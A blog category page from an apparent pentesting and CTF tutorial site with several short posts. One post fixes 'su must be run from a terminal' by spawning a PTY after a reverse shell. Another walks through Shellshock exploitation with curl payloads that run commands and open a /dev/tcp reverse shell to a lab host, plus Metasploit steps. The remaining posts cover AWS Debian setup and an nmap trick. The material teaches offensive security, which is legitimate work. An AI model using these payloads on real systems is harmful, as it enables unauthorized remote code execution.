Skip to content

GetCyber

Dan & Tamara

  • ALL
  • KALI
  • DEBIAN
  • WEB
  • MORE
    • MACOS
    • WINDOWS
    • QUICK HACKS
    • BLOGS
  • 📺 YOUTUBE VIDEOS
  • 🤓 ABOUT
    • 🗓️ EVENTS
    • 📩 CONTACT

- Live Fri & Sat on YouTube!

Recent Posts

  • Manipulating and Filtering Content in LinuxMarch 2, 2023
  • Appointment – Starting Point – Hack The Box // Walkthrough & SolutionFebruary 28, 2023
  • Sequel – Starting Point – Hack The Box // Walkthrough & SolutionFebruary 28, 2023
  • Crocodile – Starting Point – Hack The Box // Walkthrough & SolutionFebruary 28, 2023
  • Exposed: The Insidious Linux Backdoors You Never Knew ExistedFebruary 25, 2023
NEWSLETTER SIGN UP!

Recent Comments

  1. Benimaru on PIECE of cake – Install Metasploitable 2 on VirtualBoxJune 3, 2023

    Metasploitable.vmdk file is not listing in the storage tab. There is only one parent tab called "Controller:SATA" inside which two…

  2. Lauren Jones on Installing Kali Linux on Android using NetHunter and TermuxMay 26, 2023

    You're getting a "Permission denied" error because you're trying to execute a file that does not have execution permissions. The…

  3. Shadow on Installing Kali Linux on Android using NetHunter and TermuxMay 21, 2023

    Hello. I found Dan (the man) Duran while having an issue with kali on bare metal having a connectivity issue.…

  4. Shadow on Installing Kali Linux on Android using NetHunter and TermuxMay 21, 2023

    Hello. I found Dan (the man) Duran while having an issue with kali on bare metal having a connectivity issue.…

  5. Muhammad Asif on Why is my Kali Linux not connecting to Wi-Fi? 😱 // 100% Problem FIXED!May 6, 2023

    Hey Mate. I am a bigger in Kali Linix console. I am using MacBook pro. Downloaded and running fine via…

Archives

  • March 2023
  • February 2023
  • January 2023
  • December 2022
  • November 2022
  • October 2022
  • August 2022
  • June 2022
  • April 2022
  • March 2022
  • November 2021
  • October 2021

Category: FEATURED

How to fix “su : must be run from a terminal”?

Posted on February 3, 2023 - February 3, 2023 by Dan Duran

I recently pawned a web server on a pentest I was doing. I was able to upload and execute a PHP reverse shell script that gave me a shell. The issue was that it would run as the www-data user, and when I tried to su to root, I got the following error:

“su : must be run from a terminal”

How do you fix that? No worries, here’s a solution using python. Simply execute the following commands from your shell if you have Python installed:

Copy Code Copied Use a different Browser 


echo "import pty; pty.spawn('/bin/bash')" > /tmp/qwerty.py

After you do that, just apply the command:

Copy Code Copied Use a different Browser 


python /tmp/qwerty.py

Basically, what you are doing here is spawning bin/bash into a python executable file inside the tmp folder. Then just run the program using python and voila!

I hope this helps. Cheers!

Dan D.

 

Posted in DEBIAN LINUX, FEATURED, KALI LINUX, KNOWLEDGE BASE, QUICK HACKSLeave a comment

Exploiting the Shellshock Vulnerability with Kali

Posted on January 23, 2023 - January 23, 2023 by Dan Duran

Shellshock, a vulnerability that enables attackers to execute arbitrary code through the Unix Bash shell remotely, was one of the most serious flaws discovered in the recent decade.

Shellshock remains a serious hazard, particularly for unpatched systems. It affects the majority of Linux and UNIX-based operating systems. This vulnerability is now present in many CTF Challenges, thus, this article might assist you in finding a technique to attack it.

What is the Mechanism of this Vulnerability?

It is a security flaw in the Unix Bash shell that permits Bash to mistakenly execute bash commands from environment variables. The flaw is caused by BASH erroneously executing trailing instructions when importing a function definition contained in an environment variable. If an attacker can modify the environment variable list, he or she may run arbitrary commands on the system or exploit other flaws in Bash’s command interpreter.

To test the vulnerability, we must make a curl request to the target system and verify that we have obtained the “id” of the current user.

Copy Code Copied Use a different Browser 


root@kali:~# curl -A "() { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /usr/bin/id" http://192.168.175.10/cgi-bin/cgi-file.cgi

uid=33(www-data) gid=33(www-data) groups=33(www-data)

This trick works! We were successful in changing the environment variable and running the “id” command. We may open a reverse shell using the same method.

Copy Code Copied Use a different Browser 


root@kali:~# curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.175.20/9000 0>&1' http://192.168.175.10/cgi-bin/cgi-file.cgi

Of course, you need to have a listening port. In this case 9000.

Copy Code Copied Use a different Browser 


nc -lvnp 9000

On the remote system, the User-Agent value used in curl is saved as an environment variable. When using curl, this is set to HTTP USER AGENT = curl/7.47.0 by default. This value, however, may be changed. This environment variable may be used to contain malicious code that creates a reverse shell.

Metasploit-based exploitation

Metasploit may likewise be used to accomplish the same aim. Using the search function, we can quickly find exploits. We have numerous vulnerabilities, however the one we want is the apache mod cgi exploit. Here are the metasploit commands:

Copy Code Copied Use a different Browser 


└─# msf6 > search shellshock
└─# use exploit/multi/http/apache_mod_cgi_bash_env_exec 
└─# set payload linux/x86/meterpreter/reverse_tcp
└─# show options
└─# set RHOST 192.168.175.10
└─# set TARGETURI /cgi-bin/shellshock.cgi
└─# run

 

Posted in FEATURED, KALI LINUX, KNOWLEDGE BASE, QUICK HACKSLeave a comment

Installing Debian 11 on Amazon Web Services

Posted on January 20, 2023 - January 22, 2023 by Dan Duran

To install Debian 11 on Amazon Web Services (AWS), you can use the AWS Elastic Compute Cloud (EC2) service. Here are the general steps you can follow:

Register on AWS https://portal.aws.amazon.com/billing/signup

Log in to your AWS account and navigate to the EC2 dashboard.

Click on the “Launch Instance” button to start creating a new virtual machine.

Name your instance and in the search bar type “Debian 11”. Inside “Choose an Amazon Machine Image (AMI)” section, select the Debian 11 AMI x86.

Choose the type of instance you want to launch, and configure the settings as desired (such as the number of vCPUs and amount of memory). In this case, the free tier.

In the “Key pair (Login)” section, create a new “key pair.”

Name the key pair, select RSA and .pem.

The key pair .pem file will be downloaded. Make sure you keep this .pem secure and DO NOT LOSE IT!

Now, in Network Settings, create a new security group and allow SSH traffic only to “My IP”.

Configure Storage to 8GB gp2.

Click on the “Launch” button to launch the instance.

You may want to also open ports 80 (http) and 443 (https) only for your IP while you are building your stack. For that click on “View all Instances,” select your instance and click on security > Security Groups.

Click on your security group (ex: sg-05d7…).

Click on “edit inbound rules” and add HTTP > My IP and HTTPS > My IP. Save rules.

Once you have connected to your instance, you can start customizing it and installing any additional software you need.

Note: Make sure you are aware of the costs of running an instance on AWS, and shut down or terminate instances that you are no longer using to avoid unnecessary charges.

In the next post, I will show you how to connect to your instance using the private key file and the IP address or hostname of the instance using ssh.

Cheers!

 

Dan D.

Posted in DEBIAN LINUX, FEATURED, KNOWLEDGE BASE, WEB DEVLeave a comment

Nmap Cheat Sheet for outputting IP’s in simple list

Posted on March 23, 2022 - January 23, 2023 by Dan Duran

Output only the IP addresses on the terminal with nmap

You know how to use nmap to find the list of IP addresses that are currently in the network. But this could be messy.

This cheat gives you a simple list of IP addresses on the terminal so you can cut and use as you please:

Copy Code Copied Use a different Browser 


nmap -sP 192.168.1.0/24 | awk '/is up/ {print up}; {gsub (/\(|\)/,""); up = $NF}'
Posted in FEATURED, KALI LINUX, KNOWLEDGE BASE, QUICK HACKS7 Comments

Copyright ©2023 GetCyber

Click to Copy